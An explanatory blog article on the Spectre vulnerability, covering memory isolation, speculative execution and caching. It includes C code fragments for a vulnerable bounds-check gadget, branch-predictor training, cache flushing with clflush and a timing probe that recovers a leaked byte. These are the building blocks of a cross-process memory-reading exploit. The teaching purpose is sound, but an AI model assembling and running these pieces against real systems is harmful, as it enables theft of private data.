At the beginning of 2018, the IT world was shocked by the news that almost every processor manufactured in the previous 20 years contains security vulnerabilities that allow unauthorised programs to read private data.
Every process running on our computer has its own address space (a range of virtual addresses) dedicated solely to it. Virtual addresses from this space are translated into addresses in physical memory (which is shared by all processes) through a Page Table.
Every process has its own Page Table for translating virtual addresses into physical addresses. When the processor switches context, that is, when it starts executing another process, it also loads the Page Table belonging to that process.
Thanks to this, processes are isolated from each other: theoretically, one process should not have access to memory dedicated to another process. The word “theoretically” is crucial here, because by exploiting the vulnerabilities described in this article, we can write a program that is able to read memory belonging to another process.
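To make the idea concrete, here is a toy model in C. It is our own simplification: real x86-64 page tables have four or five levels and many permission bits, and the names `page_table` and `translate` are hypothetical. Two processes map the same virtual address to different physical frames, and a page that is not mapped for a process cannot be reached through translation at all.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy model, not real hardware: 4 KiB pages and a single-level
 * page table with 16 entries per process. */
#define PAGE_SHIFT 12
#define PAGE_SIZE  (1u << PAGE_SHIFT)
#define NUM_PAGES  16

typedef struct {
    int      present[NUM_PAGES]; /* 1 if the virtual page is mapped */
    uint32_t frame[NUM_PAGES];   /* physical frame number of each page */
} page_table;

/* Translate a virtual address using one process's page table.
 * Returns 0 and stores the physical address in *phys on success,
 * or -1 (a "page fault") if the page is not mapped for this process. */
int translate(const page_table *pt, uint32_t vaddr, uint32_t *phys)
{
    uint32_t page   = vaddr >> PAGE_SHIFT;     /* virtual page number */
    uint32_t offset = vaddr & (PAGE_SIZE - 1); /* offset within the page */

    assert(phys != NULL);
    if (page >= NUM_PAGES || !pt->present[page])
        return -1;
    *phys = (pt->frame[page] << PAGE_SHIFT) | offset;
    return 0;
}
```

For example, if process A maps virtual page 1 to frame 7 and process B maps it to frame 3, the same virtual address 0x1234 becomes physical address 0x7234 for A and 0x3234 for B.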
This is possible because of a few features implemented in modern processors, namely: Out Of Order Execution, Speculative Execution and Caching. But… let’s slow down a bit.
Understanding Out Of Order Execution
Simply speaking, a program is a list of instructions that are meant to be executed one by one, in the order in which they appear in the program. But because programs keep getting more complex and processors more powerful, many techniques have been developed to speed up program execution. Modern processors try to execute as many instructions as possible in advance: instead of waiting for a slow instruction (for example, a load from RAM) to finish, they execute later instructions whose input data is already available. As a result, the outcome of those instructions is ready by the time the program actually reaches them.
The results of instructions executed in advance are stored in a dedicated component called the Reorder Buffer, where they wait until all earlier instructions have finished. Only then are they committed (“retired”) in the original program order, as if the instructions had been executed one by one.
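The behaviour of the Reorder Buffer can be sketched with a toy model. As a simplification, it assumes that all instructions are independent and start executing in the same cycle, so each one finishes after its own latency. The function `simulate_rob` and the cycle counts are illustrative and not taken from any real CPU.

```c
#include <assert.h>

/* Toy model: all n instructions are independent and start at cycle 0,
 * so instruction i finishes at cycle latency[i]. Results wait in the
 * reorder buffer and retire strictly in program order: an entry retires
 * only once it has finished and every older entry has retired. */
void simulate_rob(const int *latency, int n, int *finish, int *retire)
{
    int last_retire = 0;
    for (int i = 0; i < n; i++) {
        assert(latency[i] > 0);
        finish[i] = latency[i];                       /* out-of-order completion */
        retire[i] = finish[i] > last_retire ? finish[i] /* in-order retirement */
                                            : last_retire;
        last_retire = retire[i];
    }
}
```

With latencies {10, 1, 1} (a slow load from RAM followed by two quick additions), the additions finish at cycle 1, long before the load, but all three instructions retire at cycle 10, in program order.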
What is Speculative Execution?
Programs often contain conditional instructions, at which the flow of execution diverges: depending on data known only at run time, a program can execute different sets of instructions. When executing instructions out of order, the processor does not wait until the condition has been evaluated. Instead, it predicts the result of the conditional instruction and executes the code on the predicted path in advance, so that its results are available when needed.
The processor records the outcomes of previously executed conditional jumps in special structures such as the BTB (Branch Target Buffer), and uses this statistical data to predict future jumps more accurately.
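Real branch predictors are far more complex and their exact design is not public. Still, the basic idea of “statistical data” can be sketched with a 2-bit saturating counter, a classic textbook scheme. The type and function names are ours.

```c
#include <assert.h>
#include <stdbool.h>

/* A 2-bit saturating counter: states 0-1 predict "not taken",
 * states 2-3 predict "taken". */
typedef struct { unsigned state; } predictor;

bool predict_taken(const predictor *p)
{
    return p->state >= 2;
}

/* After the branch resolves, move the counter one step toward the real
 * outcome, saturating at 0 and 3. */
void train(predictor *p, bool taken)
{
    assert(p->state <= 3);
    if (taken && p->state < 3)
        p->state++;
    else if (!taken && p->state > 0)
        p->state--;
}
```

A single “not taken” outcome after a run of “taken” ones does not flip the prediction. This inertia is what the training step of the attack described below takes advantage of.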
Let’s talk about the details:
- The processor creates a kind of checkpoint when it encounters a conditional jump instruction.
- The processor predicts the outcome of the jump and, based on this prediction, executes the instructions of the corresponding conditional block, leaving the results in the Reorder Buffer for later.
- When program execution actually reaches the conditional instruction and its result is known, the processor checks whether its prediction was correct:
  A. If the prediction was correct, the results of the following instructions are already waiting in the Reorder Buffer and are simply committed. Thanks to this, performance improves.
  B. If the prediction was wrong, the processor discards all results in the buffer back to the checkpoint and executes the correct branch instead.
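The checkpoint-and-rollback logic above can be sketched as a toy model. It is a simplification of our own: the predictor always guesses “taken”, `regs` stands for the architectural state that can be restored, and `cached` stands for the cache, which this model, like real processors, does not roll back.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Toy model: regs = architectural state (can be rolled back),
 * cached = which of 16 memory lines are in the cache (never rolled back). */
typedef struct {
    int  regs[4];
    bool cached[16];
} cpu_state;

/* The predictor has guessed "taken", so the branch body runs speculatively.
 * 'actual_taken' is the real outcome, which becomes known only later. */
void speculate_taken(cpu_state *cpu, bool actual_taken, int line)
{
    int checkpoint[4];
    assert(line >= 0 && line < 16);

    memcpy(checkpoint, cpu->regs, sizeof checkpoint); /* 1. take a checkpoint */
    cpu->regs[0] = 42;                                /* 2. speculative result */
    cpu->cached[line] = true;                         /*    side effect on the cache */

    if (!actual_taken)                                /* 3. misprediction:       */
        memcpy(cpu->regs, checkpoint, sizeof checkpoint); /* restore regs only */
}
```

After a misprediction, `regs[0]` is back to its old value, yet the memory line touched on the wrong path is still marked as cached.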
Cache is the key
Because RAM is relatively slow, the processor wastes time waiting for the data it refers to. That is why today’s processors have their own cache memory, which is many times faster than RAM. The processor keeps data that it is likely to need in the near future in the cache, which saves the time needed to fetch this data from RAM.
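A minimal sketch of a cache follows. It assumes the simplest organisation, a direct-mapped cache with 8 lines of 64 bytes, and uses round-number latencies chosen only for illustration. The first access to an address is a slow miss. A second access to the same 64-byte block is a fast hit. A different block that maps to the same line evicts it.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy direct-mapped cache: 8 lines of 64 bytes each. The latencies are
 * illustrative round numbers, not measurements of any real CPU. */
#define LINE_SIZE   64
#define NUM_LINES   8
#define HIT_CYCLES  4
#define MISS_CYCLES 200

typedef struct {
    bool     valid[NUM_LINES];
    uint64_t tag[NUM_LINES];
} cache;

/* Return the cost of loading 'addr' and fill the cache on a miss. */
int cache_access(cache *c, uint64_t addr)
{
    uint64_t block = addr / LINE_SIZE;                /* which 64-byte block */
    unsigned index = (unsigned)(block % NUM_LINES);   /* line it maps to */
    uint64_t tag   = block / NUM_LINES;               /* identifies the block */

    if (c->valid[index] && c->tag[index] == tag)
        return HIT_CYCLES;              /* hit: served from the cache */
    c->valid[index] = true;             /* miss: fetch from RAM, keep a copy */
    c->tag[index] = tag;
    return MISS_CYCLES;
}
```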
Is protected memory really protected?
In a standard situation, the processor checks whether a given process is authorised to access a particular memory cell. It also ensures that no process refers directly to physical memory. However, such a check takes time, and the processor has to spend valuable clock cycles on it.
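Because of this, for optimisation purposes, instructions executed out of order do not wait for this check: a violation is only reported when the instruction is committed, and by then the instructions that depend on it may already have been executed. And that’s what makes attacks like Spectre and Meltdown possible.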
Let’s start by discussing, step by step, how Spectre works. This attack allows us to read memory belonging to another process. The vulnerability affects almost every modern processor, regardless of the manufacturer. It doesn’t matter whether someone uses a processor from Intel, AMD or ARM (for mobile devices), because they are all vulnerable.
The problem is caused by the two lines of code shown below. Let’s assume that we want to read the memory of a program that either contains this piece of code or allows us to insert a script containing it.
if (x < array1_size)
    y = array2[array1[x]];
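Below is a compilable version of the snippet. The global names follow the snippet. The array sizes, the `volatile` qualifier on `y` (so the compiler cannot drop the load) and the `STRIDE` of 4096 bytes are our assumptions. Published proofs of concept multiply the index by such a stride so that each of the 256 possible byte values touches a different cache line.

```c
#include <stddef.h>
#include <stdint.h>

#define STRIDE 4096 /* assumption: one probe slot per 4 KiB page */

size_t array1_size = 16;
uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t array2[256 * STRIDE]; /* probe array: 256 slots, STRIDE bytes apart */
volatile uint8_t y;           /* volatile so the load below is not optimised away */

void victim_function(size_t x)
{
    if (x < array1_size)                /* bounds check the CPU may speculate past */
        y = array2[array1[x] * STRIDE]; /* touches slot number array1[x] */
}
```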
The first step is to train the branch predictor. As I wrote earlier, the processor keeps statistics about previous jumps (for example in the BTB, Branch Target Buffer) and uses them to predict jumps during Speculative Execution. We run the above code many times with a valid value of “x”, so that the condition is fulfilled each time. The processor then “gets used to” it, and the next time it reaches this condition, it will predict that the condition is fulfilled.
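One way to organise the training is sketched below, modelled loosely on the published Spectre proof of concept: out of every six calls, five pass an in-bounds `training_x` and the sixth passes the out-of-bounds `malicious_x`. The helper `pick_x` is hypothetical. It selects the value with bit masking rather than an `if`, so that it does not add an obvious conditional branch of its own (the compiler still decides the final machine code).

```c
#include <stddef.h>

/* Hypothetical helper: choose the argument for call number i.
 * Calls 0-4 of every group of six return training_x (teaching the
 * predictor that the condition is true); call 5 returns malicious_x. */
size_t pick_x(size_t i, size_t training_x, size_t malicious_x)
{
    /* mask is all ones when i % 6 == 5, otherwise all zeros */
    size_t mask = (size_t)0 - (size_t)(i % 6 == 5);
    return training_x ^ (mask & (malicious_x ^ training_x));
}
```

A caller would then run something like `for (size_t i = 0; i < 30; i++) victim_function(pick_x(i, training_x, malicious_x));`, where `victim_function` wraps the two lines above.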
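Next, we need to make sure that array2 is not in the processor cache. On x86 processors, we can use the “clflush” instruction, which evicts the cache line containing a given address from every cache level. Calling it for each element of array2 that we will examine later accomplishes this.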
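A minimal x86-only sketch follows, using the `_mm_clflush` and `_mm_mfence` intrinsics from `<emmintrin.h>` (available in GCC and Clang). The function name and the 4096-byte `STRIDE` between probed elements are our assumptions. Flushing `array1_size` as well is a common extra step: it makes the comparison `x < array1_size` wait for RAM, which gives the speculative path more time to run.

```c
#include <emmintrin.h> /* _mm_clflush, _mm_mfence (SSE2, x86 only) */
#include <stddef.h>
#include <stdint.h>

#define STRIDE 4096 /* assumption: distance between probed elements */

/* Evict every probe slot of array2 (256 slots, STRIDE bytes apart) and
 * the bound variable from all cache levels. */
void flush_probe(uint8_t *array2, const size_t *array1_size)
{
    for (int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * STRIDE]);
    _mm_clflush(array1_size);
    _mm_mfence(); /* order the flushes before any later memory accesses */
}
```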
Then we can move on to the actual attack by passing a value of x that lies outside array1 and points at a memory location that we are normally not allowed to read.
Of course, the condition that checks whether x is smaller than the array size will evaluate to “false”, but before that happens, the processor will most likely have already executed the conditional block speculatively, using our prepared “x”. No exception is raised: the processor does not check array bounds by itself (the only bounds check is the “if” statement, whose outcome it has just predicted incorrectly), and once the misprediction is detected, the speculative results are simply discarded.
Let’s assume that array1 is an array of char, where a single char occupies one byte. The expression array1[x] will then return one byte of memory that we previously had no access to. This sounds great, but how can we actually read this single byte? Let’s take a closer look at the code responsible for the attack. It contains the following construct:
y = array2[array1[x]];
Here we read the element of array2 whose index is equal to the value of the byte we have “illegally” read. As a result, this element of array2 is loaded into the processor cache.
We have thus created a situation in which the element of array2 whose index equals the secret byte is in the cache memory. The speculative results themselves were discarded, but the change in the cache was not rolled back, and this trace is what we can now exploit.
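In practice, the index is usually multiplied by a stride, and a little arithmetic shows why. Caches work in lines of typically 64 bytes. With the snippet exactly as written (a stride of one byte), 64 consecutive byte values would land on the same cache line, and the timing probe could not tell them apart. The helper below (a hypothetical name, assuming 64-byte lines) computes which cache line of array2 a given byte value touches.

```c
#include <assert.h>
#include <stddef.h>

#define CACHE_LINE 64 /* assumption: typical x86 cache line size in bytes */

/* Index of the cache line of array2 touched by array2[value * stride]. */
size_t line_touched(unsigned char value, size_t stride)
{
    assert(stride > 0);
    return ((size_t)value * stride) / CACHE_LINE;
}
```

With a stride of 1, the values 0 and 63 touch the same line. With a stride of 4096, every value gets its own line (and even its own page).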
To finish, we need to find out which element of array2 ended up in the CPU cache, because its index is the byte we are looking for. We can do this by accessing every element of array2 and measuring the access time of each one. An element that is in the cache is returned much faster than the others, because cache memory is much faster than RAM.
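A minimal sketch of this timing probe follows, for x86 with GCC or Clang. It uses the `__rdtscp` intrinsic from `<x86intrin.h>` to read the time-stamp counter. The function names and the 4096-byte `STRIDE` are our assumptions. The scrambled visiting order is similar to the one in the published proof of concept and is meant to stop the hardware prefetcher from loading slots ahead of time. A real attack would repeat the measurement many times and ignore the slot touched by the training value, because single measurements are noisy.

```c
#include <stdint.h>
#include <x86intrin.h> /* __rdtscp (GCC/Clang, x86 only) */

#define STRIDE 4096 /* assumption: distance between probe slots */

/* Time one load in time-stamp-counter ticks; a small value means the
 * line was already cached. */
static uint64_t time_load(const volatile uint8_t *p)
{
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    uint8_t value = *p; /* the load being timed */
    (void)value;
    return __rdtscp(&aux) - start;
}

/* Index of the fastest probe slot, i.e. the guessed byte value. */
int fastest_slot(const uint64_t timings[256])
{
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (timings[i] < timings[best])
            best = i;
    return best;
}

/* Probe all 256 slots of array2 and return the guessed byte value. */
int probe_byte(const uint8_t *array2)
{
    uint64_t timings[256];
    for (int i = 0; i < 256; i++) {
        /* 167 is odd, so this visits every slot exactly once, out of order */
        int slot = ((i * 167) + 13) & 255;
        timings[slot] = time_load(&array2[slot * STRIDE]);
    }
    return fastest_slot(timings);
}
```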
As a result, we have read one byte of the process’s virtual memory that we previously had no access to. By incrementing the value of “x” with every iteration of the attack, we can read the process’s entire virtual memory, byte by byte.
Find more of Mariusz’s texts here: https://softwarehut.com/blog/author/mariusz-dobrowolski/